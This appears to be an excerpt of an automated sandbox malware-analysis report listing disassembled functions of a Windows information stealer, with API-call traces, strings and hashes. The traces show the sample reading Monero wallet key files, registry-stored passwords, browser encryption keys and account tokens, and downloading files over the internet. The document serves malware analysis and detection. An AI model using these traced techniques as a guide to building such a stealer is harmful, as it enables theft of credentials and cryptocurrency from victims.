                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: d14bb9bfaa14d7c4ae7e94d288abad96c098878f6538f754dcc917ea1f6a337b
                        • Instruction ID: b9d74ebf1c058a32c689acbd6461740430be0a4882e8e1e2bdfd0bd540779723
                        • Opcode Fuzzy Hash: d14bb9bfaa14d7c4ae7e94d288abad96c098878f6538f754dcc917ea1f6a337b
                        • Instruction Fuzzy Hash: 29510C709111489BCB98FFA0C992AEE777AAF12301F50401DF9075A591DF34AF46CF66
                        Function 006A12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: c10f1478afc6c3aae87ce0f4f14b1e9955f1d058e3e18149da59aff646d348c8
                        • Instruction ID: 91223af96eb14f62322632c25ba0b2ec5a67ebcdd49790cfc1f391ba89cafcb7
                        • Opcode Fuzzy Hash: c10f1478afc6c3aae87ce0f4f14b1e9955f1d058e3e18149da59aff646d348c8
                        • Instruction Fuzzy Hash: 67C1B3B59011089BCB58FFA0DC89FEA777ABF55300F10459DE50AA7241EB30AE85CF95
                        Function 006A4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006A42EC
                        • lstrcat.KERNEL32(?,0126F580), ref: 006A430B
                        • lstrcat.KERNEL32(?,?), ref: 006A431F
                        • lstrcat.KERNEL32(?,0126E5E0), ref: 006A4333
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006A8D90: GetFileAttributesA.KERNEL32(00000000,?,00691B54,?,?,006B564C,?,?,006B0E1F), ref: 006A8D9F
                          • Part of subcall function 00699CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00699D39
                          • Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                          • Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                          • Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                          • Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                          • Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
                          • Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                          • Part of subcall function 006A93C0: GlobalAlloc.KERNEL32(00000000,006A43DD,006A43DD), ref: 006A93D3
                        • StrStrA.SHLWAPI(?,0126F658), ref: 006A43F3
                        • GlobalFree.KERNEL32(?), ref: 006A4512
                          • Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
                          • Part of subcall function 00699AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
                          • Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
                          • Part of subcall function 00699AC0: LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 006A44A3
                        • StrCmpCA.SHLWAPI(?,006B08D1), ref: 006A44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006A44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 006A44E5
                        • lstrcat.KERNEL32(00000000,006B0FB8), ref: 006A44F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 410a6937c5537eeca110dc68e09a7e5514c565f48e719a1b98c88fc9aa847831
                        • Instruction ID: c57efa390a197b70e763b0f850d85a44cb7bf272a70a5982262b18324e70ddf5
                        • Opcode Fuzzy Hash: 410a6937c5537eeca110dc68e09a7e5514c565f48e719a1b98c88fc9aa847831
                        • Instruction Fuzzy Hash: 6A7151B6900208ABCB54FBE4DC85FEE73BABB89300F00459DE60597181EA74DB45CFA5
                        Function 00691310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006912B4
                          • Part of subcall function 006912A0: RtlAllocateHeap.NTDLL(00000000), ref: 006912BB
                          • Part of subcall function 006912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006912D7
                          • Part of subcall function 006912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006912F5
                          • Part of subcall function 006912A0: RegCloseKey.ADVAPI32(?), ref: 006912FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0069134F
                        • lstrlen.KERNEL32(?), ref: 0069135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00691377
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00691465
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                          • Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                          • Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                          • Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                          • Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
                          • Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 006914EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 7423cf1bf8ae06c9dd7c8f0a8a36adcdeab3171312f416a541f2689d02ced2e6
                        • Instruction ID: 248b9b7b8b6391193d7080814fe1a2fdcd10157b130458576b9cfb4c538efeb5
                        • Opcode Fuzzy Hash: 7423cf1bf8ae06c9dd7c8f0a8a36adcdeab3171312f416a541f2689d02ced2e6
                        • Instruction Fuzzy Hash: 475133B19501195BCB95FB60DC92BEE737DAF55300F40419DB60A62082EF345F86CFAA
                        Function 006975D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006972D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0069733A
                          • Part of subcall function 006972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
                          • Part of subcall function 006972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
                          • Part of subcall function 006972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00697452
                          • Part of subcall function 006972D0: HeapFree.KERNEL32(00000000), ref: 00697459
                        • lstrcat.KERNEL32(00000000,006B17FC), ref: 00697606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00697648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0069765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0069768F
                        • lstrcat.KERNEL32(00000000,006B1804), ref: 006976A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006976D3
                        • lstrcat.KERNEL32(00000000,006B1808), ref: 006976ED
                        • task.LIBCPMTD ref: 006976FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: ede245171b1d281a2f5d190b505589573632778b459da7ebcb4089bfa7d2501b
                        • Instruction ID: c3123ef73875bd808befab46a7b5bbcd4a91817804b2a14e499f7fa7c41b3544
                        • Opcode Fuzzy Hash: ede245171b1d281a2f5d190b505589573632778b459da7ebcb4089bfa7d2501b
                        • Instruction Fuzzy Hash: 44316B71902109EFCF48EBB4EC99DFE737EBB55301F244219E502A72A0DA34E942DB55
                        Function 006960A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                          • Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                        • InternetOpenA.WININET(006B0DF7,00000001,00000000,00000000,00000000), ref: 0069610F
                        • StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0069618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006961B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 006961DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0069620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00696249
                        • InternetCloseHandle.WININET(?), ref: 00696253
                        • InternetCloseHandle.WININET(00000000), ref: 00696260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 0e86810073114247876769721b07f604a63476ed222c87c0223b149e2a7acf1d
                        • Instruction ID: 9c9f2e1b7c49c983b025533d297a3c2747b61fc9c8a7ca5558d9af88185fccec
                        • Opcode Fuzzy Hash: 0e86810073114247876769721b07f604a63476ed222c87c0223b149e2a7acf1d
                        • Instruction Fuzzy Hash: 54515FB1A00218ABDF24EFA0DC45BEE77B9FB44701F108199B605A71C0DB746E85CF95
                        Function 006972D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0069733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006973B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0069740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00697452
                        • HeapFree.KERNEL32(00000000), ref: 00697459
                        • task.LIBCPMTD ref: 00697555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: f7c7ef32a996843ea5cb9af8dc149721e1192b31c841b8b5d6dc35d0b24368c6
                        • Instruction ID: 93bc6b8df2eea709506bea50df9473216ba4b983cf589a9c7fc043bcb5afe6ff
                        • Opcode Fuzzy Hash: f7c7ef32a996843ea5cb9af8dc149721e1192b31c841b8b5d6dc35d0b24368c6
                        • Instruction Fuzzy Hash: B76117B59141689BDB24DB50CC41BEAB7BDBF44300F0081E9E689A7641DB706BC9CFA5
                        Function 0069BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                        • lstrlen.KERNEL32(00000000), ref: 0069BC9F
                          • Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0069BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0069BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0069BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 224f72526152e8ce1653f42a8826d24bf39ece57cdf1f25c06e12acc731f660c
                        • Instruction ID: 13d796a7082a902013f333db9c996eac5a23beed4dcd89c577630b7529505946
                        • Opcode Fuzzy Hash: 224f72526152e8ce1653f42a8826d24bf39ece57cdf1f25c06e12acc731f660c
                        • Instruction Fuzzy Hash: 03B11B71910108ABDB84FBE0DD96EEE737AAF15300F50415EF506A6092EF34AE49CF66
                        Function 006A6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: fa14b9605d1e332205a09ecced430a85ea78df1f626f8d044f9631b30f79a2dc
                        • Instruction ID: 59ace504558743facb5b9ba6c8a39549be4d1dcc0d0d66870b89d16c60f8caa0
                        • Opcode Fuzzy Hash: fa14b9605d1e332205a09ecced430a85ea78df1f626f8d044f9631b30f79a2dc
                        • Instruction Fuzzy Hash: 86F05E3091520DEFD348AFE0E90976C7BB0FB05703F28029AF64986390DA708B41DF96
                        Function 00694FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00694FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00694FD1
                        • InternetOpenA.WININET(006B0DDF,00000000,00000000,00000000,00000000), ref: 00694FEA
